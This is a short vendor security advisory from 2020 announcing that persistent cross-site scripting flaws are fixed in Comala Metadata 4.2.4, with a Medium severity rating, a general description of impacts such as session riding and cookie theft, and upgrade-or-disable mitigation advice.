Comala Metadata Security Advisory 2020-10-27

This advisory discloses security vulnerabilities found and fixed in Comala Metadata. We recommend upgrading Comala Metadata to the latest supported version.

Affected Versions

The vulnerability affects Comala Metadata prior to version 4.2.4

The 4.2.4 release contains a fix for the issue mentioned below.

XSS Vulnerabilities

Severity

Comalatech rates the severity of these issues as Medium according to the published Atlassian Security Levels. We have ranked the vulnerability as medium because:

A registered user with edit permissions over pages or blog posts in the application could do the following:
- Session riding
- Stealing information and cookies
- Creating a phishing page within the domain

This is an independent assessment and you should evaluate its applicability to your own IT environment.

Description

We have fixed some persistent cross site scripting vulnerabilities in Comala Metadata. The vulnerability could allow a user with edit permissions to use other user's session.

Risk Mitigation

Sites running Comala Metadata prior to version 4.2.4 are recommend to upgrade to Comala Metadata 4.2.4.

If upgrading immediately is not possible please disable the application until you can upgrade it.

Comala Metadata Data Center and Server

This site has moved to the integrated Appfire documentation and information site for our apps.